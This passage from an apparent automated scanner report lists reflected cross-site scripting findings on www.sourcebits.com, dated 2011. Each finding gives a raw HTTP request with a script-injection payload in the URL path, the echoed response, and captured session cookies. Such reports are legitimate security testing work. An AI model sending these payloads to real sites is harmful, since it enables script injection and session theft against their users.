Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=163152062.1305928078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163152062.2103716654.1305928078.1305928078.1305928078.1; __utmc=163152062; __utmb=163152062.1.10.1305928078; PHPSESSID=1fqsfclgikrhu2gr4fir36fp36; X-Mapping-nbhajkek=6075C85ECEB9C622B855771404A705BE

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:55:32 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28663

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<h2>You were trying to reach http://www.sourcebits.com/css/colorbox.css3945b<script>alert(1)</script>5c1e51610db?1292234336</h2>
...[SNIP]...

1.28. http://www.sourcebits.com/css/colorbox.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sourcebits.com
Path:	/css/colorbox.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ae809"><script>alert(1)</script>4daeb0b06a9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css/colorbox.cssae809"><script>alert(1)</script>4daeb0b06a9?1292234336 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/design
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=163152062.1305928078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163152062.2103716654.1305928078.1305928078.1305928078.1; __utmc=163152062; __utmb=163152062.1.10.1305928078; PHPSESSID=1fqsfclgikrhu2gr4fir36fp36; X-Mapping-nbhajkek=6075C85ECEB9C622B855771404A705BE

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:55:30 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28669

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<link rel="canonical" href="http://www.sourcebits.com/css/colorbox.cssae809"><script>alert(1)</script>4daeb0b06a9?1292234336" />
...[SNIP]...

1.29. http://www.sourcebits.com/css/components.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sourcebits.com
Path:	/css/components.css

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 38be1<script>alert(1)</script>7fafc427363 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css38be1<script>alert(1)</script>7fafc427363/components.css?1292234336 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/iphone
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=163152062.1305928078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163152062.2103716654.1305928078.1305928078.1305928078.1; __utmc=163152062; __utmb=163152062.1.10.1305928078; PHPSESSID=1fqsfclgikrhu2gr4fir36fp36; X-Mapping-nbhajkek=6075C85ECEB9C622B855771404A705BE

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:55:12 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28691

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<h2>You were trying to reach http://www.sourcebits.com/css38be1<script>alert(1)</script>7fafc427363/components.css?1292234336</h2>
...[SNIP]...

1.30. http://www.sourcebits.com/css/components.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sourcebits.com
Path:	/css/components.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 24402"><script>alert(1)</script>2767f158784 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css24402"><script>alert(1)</script>2767f158784/components.css?1292234336 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/iphone
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=163152062.1305928078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163152062.2103716654.1305928078.1305928078.1305928078.1; __utmc=163152062; __utmb=163152062.1.10.1305928078; PHPSESSID=1fqsfclgikrhu2gr4fir36fp36; X-Mapping-nbhajkek=6075C85ECEB9C622B855771404A705BE

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:55:09 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28699

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<link rel="canonical" href="http://www.sourcebits.com/css24402"><script>alert(1)</script>2767f158784/components.css?1292234336" />
...[SNIP]...

1.31. http://www.sourcebits.com/css/components.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sourcebits.com
Path:	/css/components.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5a246<script>alert(1)</script>719e1cebf86 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css/components.css5a246<script>alert(1)</script>719e1cebf86?1292234336 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/iphone
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=163152062.1305928078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163152062.2103716654.1305928078.1305928078.1305928078.1; __utmc=163152062; __utmb=163152062.1.10.1305928078; PHPSESSID=1fqsfclgikrhu2gr4fir36fp36; X-Mapping-nbhajkek=6075C85ECEB9C622B855771404A705BE

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:55:25 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28669

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<h2>You were trying to reach http://www.sourcebits.com/css/components.css5a246<script>alert(1)</script>719e1cebf86?1292234336</h2>
...[SNIP]...

1.32. http://www.sourcebits.com/css/components.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sourcebits.com
Path:	/css/components.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20f19"><script>alert(1)</script>4731736a1b8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css/components.css20f19"><script>alert(1)</script>4731736a1b8?1292234336 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/iphone
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=163152062.1305928078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163152062.2103716654.1305928078.1305928078.1305928078.1; __utmc=163152062; __utmb=163152062.1.10.1305928078; PHPSESSID=1fqsfclgikrhu2gr4fir36fp36; X-Mapping-nbhajkek=6075C85ECEB9C622B855771404A705BE

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:55:22 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28675

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<link rel="canonical" href="http://www.sourcebits.com/css/components.css20f19"><script>alert(1)</script>4731736a1b8?1292234336" />
...[SNIP]...

1.33. http://www.sourcebits.com/css/home.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sourcebits.com
Path:	/css/home.css

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 5c056<script>alert(1)</script>f893d4da48e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css5c056<script>alert(1)</script>f893d4da48e/home.css?1305902900 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=vtaam4slf514spuap2khebtuj4; X-Mapping-nbhajkek=BDC73E7CC2D1E217869AC63E75EE3DA7

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:48:10 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28673

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<h2>You were trying to reach http://www.sourcebits.com/css5c056<script>alert(1)</script>f893d4da48e/home.css?1305902900</h2>
...[SNIP]...

1.34. http://www.sourcebits.com/css/home.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sourcebits.com
Path:	/css/home.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bfbb2"><script>alert(1)</script>5df92099c8f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cssbfbb2"><script>alert(1)</script>5df92099c8f/home.css?1305902900 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=vtaam4slf514spuap2khebtuj4; X-Mapping-nbhajkek=BDC73E7CC2D1E217869AC63E75EE3DA7

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:48:04 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28681

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<link rel="canonical" href="http://www.sourcebits.com/cssbfbb2"><script>alert(1)</script>5df92099c8f/home.css?1305902900" />
...[SNIP]...

1.35. http://www.sourcebits.com/css/home.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sourcebits.com
Path:	/css/home.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b8ac3"><script>alert(1)</script>ce3546596cf was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css/home.cssb8ac3"><script>alert(1)</script>ce3546596cf?1305902900 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=vtaam4slf514spuap2khebtuj4; X-Mapping-nbhajkek=BDC73E7CC2D1E217869AC63E75EE3DA7

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:48:21 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28657

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<link rel="canonical" href="http://www.sourcebits.com/css/home.cssb8ac3"><script>alert(1)</script>ce3546596cf?1305902900" />
...[SNIP]...

1.36. http://www.sourcebits.com/css/home.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sourcebits.com
Path:	/css/home.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 398f9<script>alert(1)</script>3a00bb57702 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css/home.css398f9<script>alert(1)</script>3a00bb57702?1305902900 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=vtaam4slf514spuap2khebtuj4; X-Mapping-nbhajkek=BDC73E7CC2D1E217869AC63E75EE3DA7

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:48:29 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28651

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<h2>You were trying to reach http://www.sourcebits.com/css/home.css398f9<script>alert(1)</script>3a00bb57702?1305902900</h2>
...[SNIP]...

1.37. http://www.sourcebits.com/css/lightbox.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sourcebits.com
Path:	/css/lightbox.css

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d0211<script>alert(1)</script>9ec8785078a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cssd0211<script>alert(1)</script>9ec8785078a/lightbox.css?1292234337 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/iphone
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=163152062.1305928078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163152062.2103716654.1305928078.1305928078.1305928078.1; __utmc=163152062; __utmb=163152062.1.10.1305928078; PHPSESSID=1fqsfclgikrhu2gr4fir36fp36; X-Mapping-nbhajkek=6075C85ECEB9C622B855771404A705BE

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:55:12 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28685

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<h2>You were trying to reach http://www.sourcebits.com/cssd0211<script>alert(1)</script>9ec8785078a/lightbox.css?1292234337</h2>
...[SNIP]...

1.38. http://www.sourcebits.com/css/lightbox.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sourcebits.com
Path:	/css/lightbox.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ec140"><script>alert(1)</script>fbb9a01d5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cssec140"><script>alert(1)</script>fbb9a01d5/lightbox.css?1292234337 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/iphone
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=163152062.1305928078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163152062.2103716654.1305928078.1305928078.1305928078.1; __utmc=163152062; __utmb=163152062.1.10.1305928078; PHPSESSID=1fqsfclgikrhu2gr4fir36fp36; X-Mapping-nbhajkek=6075C85ECEB9C622B855771404A705BE

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:55:09 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28687

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<link rel="canonical" href="http://www.sourcebits.com/cssec140"><script>alert(1)</script>fbb9a01d5/lightbox.css?1292234337" />
...[SNIP]...

1.39. http://www.sourcebits.com/css/lightbox.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sourcebits.com
Path:	/css/lightbox.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 82cd0<script>alert(1)</script>d709265ed6a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css/lightbox.css82cd0<script>alert(1)</script>d709265ed6a?1292234337 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/iphone
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=163152062.1305928078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163152062.2103716654.1305928078.1305928078.1305928078.1; __utmc=163152062; __utmb=163152062.1.10.1305928078; PHPSESSID=1fqsfclgikrhu2gr4fir36fp36; X-Mapping-nbhajkek=6075C85ECEB9C622B855771404A705BE

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:55:25 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28663

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<h2>You were trying to reach http://www.sourcebits.com/css/lightbox.css82cd0<script>alert(1)</script>d709265ed6a?1292234337</h2>
...[SNIP]...

1.40. http://www.sourcebits.com/css/lightbox.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sourcebits.com
Path:	/css/lightbox.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 287fc"><script>alert(1)</script>cb1a4aac2a8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css/lightbox.css287fc"><script>alert(1)</script>cb1a4aac2a8?1292234337 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/iphone
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=163152062.1305928078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163152062.2103716654.1305928078.1305928078.1305928078.1; __utmc=163152062; __utmb=163152062.1.10.1305928078; PHPSESSID=1fqsfclgikrhu2gr4fir36fp36; X-Mapping-nbhajkek=6075C85ECEB9C622B855771404A705BE

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:55:22 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28669

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<link rel="canonical" href="http://www.sourcebits.com/css/lightbox.css287fc"><script>alert(1)</script>cb1a4aac2a8?1292234337" />
...[SNIP]...

1.41. http://www.sourcebits.com/css/main.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sourcebits.com
Path:	/css/main.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c087c"><script>alert(1)</script>f6890790475 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cssc087c"><script>alert(1)</script>f6890790475/main.css?1292324578 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=vtaam4slf514spuap2khebtuj4; X-Mapping-nbhajkek=BDC73E7CC2D1E217869AC63E75EE3DA7

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:48:07 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28681

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<link rel="canonical" href="http://www.sourcebits.com/cssc087c"><script>alert(1)</script>f6890790475/main.css?1292324578" />
...[SNIP]...

1.42. http://www.sourcebits.com/css/main.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sourcebits.com
Path:	/css/main.css

Issue detail

